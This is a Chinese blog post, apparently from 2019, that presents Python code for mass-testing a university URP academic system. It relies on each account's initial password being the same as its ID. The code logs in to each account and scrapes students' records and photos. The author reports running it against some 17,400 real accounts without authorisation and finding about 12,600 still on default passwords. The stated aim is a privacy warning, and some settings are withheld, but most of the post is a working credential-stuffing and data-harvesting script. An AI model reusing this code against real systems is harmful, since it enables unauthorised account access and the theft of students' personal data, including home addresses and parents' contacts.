你的我的信息正暴露在互聯網中！Python 爬蟲獲取 URP 教務系統學籍信息

時間 2019-11-22

標籤我的信息暴露互聯網中 python 爬蟲獲取 urp 教務系統學籍欄目 Python 简体版

原文原文鏈接

原創文章，轉載務必註明原文連接！

初衷

本文旨在提醒同窗們及時修改密碼，加強保護我的隱私的意識，所以代碼中一些關鍵數據以及校名等信息不會公開！複製粘貼文章中的代碼不會爬到任何東西。只是做爲學習 Python 爬蟲的一點總結而已！html

做者所在學校的教務系統安全防範措施可謂很是不嚴密，學生登陸甚至不須要圖形驗證碼。每一年學生入學以後，學校下發的帳號，初始密碼不是無規律的，而是和帳號徹底一致！若是學生不及時修改密碼，那麼其餘人能夠輕鬆登陸他的帳號。登陸後能夠看到學生的學籍信息，包括高考報名時照片，家長聯繫方式等，聯繫地址甚至詳細到幾單元幾樓幾號門，我的信息泄露狀況很是嚴重！python

結果

先說結果。通過兩天連寫帶調試，終於完成了對全校本科生 17400 多個在網帳號的測試，其中有 12600 多個帳號使用的仍是初始密碼。此處隱去校名，統計結果以下：git

序號	學院	年級	在網帳號	可爬帳號	年級佔比
1	本一	2014	3157	1998	63.29%
2	本一	2015	3328	2234	67.13%
3	本一	2016	3641	3066	84.21%
4	本一	2017	3497	3326	95.11%
5	本三	2014	1759	303	17.23%
6	本三	2015	1643	620	37.74%
7	本三	2016	1605	1434	89.35%
8	本三	2017	1552	639	41.17%

介於初衷，只爬了 10 個帳號的信息，以示嚴重性！github

過程

本人以前作過近 2 年的 Java 相關開發，對 HTTP 協議中經常使用的知識瞭解一些，再加上 Python 出了名的簡潔易用，所以入門仍是比較輕鬆的。去年有一段時間研究過一陣子 Python，使用的是 Scrapy 框架，因此這一次我也首先想到了 Scrapy。瀏覽器

Scrapy 這種框架適用的情形是：已經獲取了須要爬取的頁面的一系列 URL ，或者 URL 是成必定規律變化的，不須要登陸或者登陸一次拿到 Cookie 就能夠拿着這個 Cookie 一直用了。可是教務系統徹底相反，它須要每次都進行登陸，也許 Scrapy 有辦法，但也不會太簡單，索性本身寫。安全

這套教務系統雖然安全性不怎麼樣，但也已經是一套成熟的產品了，功能和穩定性上仍是很不錯的。服務器

首先使用 Firefox 瀏覽器的開發者工具查看 HTTP 通訊的一些信息：cookie

登陸表單經過 POST 請求進行提交，參數是帳號和密碼，發送的也是明文app

服務器返回的響應中 Set-Cookie 就至關於給用戶下發的令牌，用戶下一次請求的時候帶上這塊令牌，服務器就能認出來這個用戶是否剛登陸過。這個令牌是有時間限制的，每次請求都會刷新一次時間，若是兩次請求之間間隔時間超過設定值，那麼服務器就不認識用戶了，此次會話就結束了，須要從新登陸。框架

剛開始使用的是 requests ，用 for 循環實現，因爲 requests 是同步的，因此效率很低，還會常常卡死。後來改爲了協程，用的 gevent + urllib3，效率提高了上百倍。解析 HTML 用的 lxml 的 etree，圖片的保存用 PIL 的 Image。

先引入依賴

import sys
import logging
import gevent
import urllib3
import pathlib
from PIL import Image
from io import BytesIO
from lxml import etree
複製代碼

建立 HTTP 鏈接池

http = urllib3.HTTPConnectionPool(
	host=settings.SERVER_HOST,
	port=settings.SERVER_PORT,
	strict=False,
	maxsize=100,
	block=False,
	retries=100,
	timeout=10
)
複製代碼

請求頭的一些固定信息能夠預先設定好，假裝瀏覽器

header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Cache-Control': 'max-age=0',
	'Connection': 'Keep-alive',
	'Host': settings.SERVER_HOST,
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
複製代碼

登陸並驗證是不是初始密碼

# 帳號校驗器
class InfoValidate(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 有效帳號
		self.account_valid = []
		# 可爬帳號
		self.account_available = []

	def validate(self, all_account):
		# 將全部校驗過程加入隊列
		jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account]
		gevent.joinall(jobs, timeout=0)

	def validate_account(self, http, account):
		# 登陸請求參數
		param = {"zjh": account, "mm": account}
		header = headers.header
		response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header)
		self.logger.info('發送請求>>{}'.format(param))
		self.logger.info(response.status)
		# 響應體解碼
		res_text = response.data.decode('GB2312', 'ignore')

		if res_text.find('密碼不正確') > -1:
			# 密碼有誤
			self.account_valid.append(account)
		elif not res_text.find('證件號不存在') > -1:
			# 帳號可爬
			self.account_available.append(account)
			self.account_valid.append(account)
			self.logger.info("帳號可用>>>{}".format(account))
複製代碼

至此已經獲取了全部初始密碼未修改的帳號了，下面研究一下，要爬取的學籍信息頁的規律

一系列的信息都包裹在 <td width = "275"></td>之間，對應的 xpath 表達式即爲 //td[starts-with(@width,"275")]/text()

基於以前對帳號的測試，爬取學籍信息

# 信息收集器
class InfoCollect(object):
	def __init__(self):
		self.logger = InfoMain.logger
		self.http = InfoMain.http
		# 功能模塊
		self.mod_get_roll_info = settings.MOD_ROLL_INFO
		self.mod_get_roll_img = settings.MOD_ROLL_IMG

	def get_info_queue(self, accounts):
		# 將全部信息收集過程加入隊列
		jobs = [gevent.spawn(self.get_info, a) for a in accounts]
		gevent.joinall(jobs, timeout=0)

	def get_info(self, stuid):
		# 登陸
		param = {'zjh': stuid, 'mm': stuid}
		response = self.http.request('POST', settings.URL_LOGIN, fields=param)
		# 保存 Cookie
		cookie = response.headers['Set-Cookie'].replace('; path=/', '')
		header = headers.header
		header['cookie'] = cookie
		# 學籍信息
		if self.mod_get_roll_info:
			# 帶 Cookie 訪問學籍信息頁
			response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header)
			text = response_xjxx.data.decode('GB2312', 'ignore')
			# 解析頁面內容
			selector = etree.HTML(text)
			text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()')
			# 學籍信息
			result = []
			for info in text_arr:
				result.append(info.strip())
			self.save_info(result)
		# 學籍照片
		if self.mod_get_roll_img:
			response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header)
			image = Image.open(BytesIO(response_xjzp.data))
			setpath = settings.PATH_IMG_SAVE
			path = pathlib.Path(setpath)
			if not path.exists():
				path.mkdir()
			setpath = setpath + '/' + stuid + '.jpg'
			image.save(setpath)
			self.logger.info('保存照片>>>{}'.format(setpath))

		# 登出
		self.http.request('POST', settings.URL_LOGOUT, headers=header)
複製代碼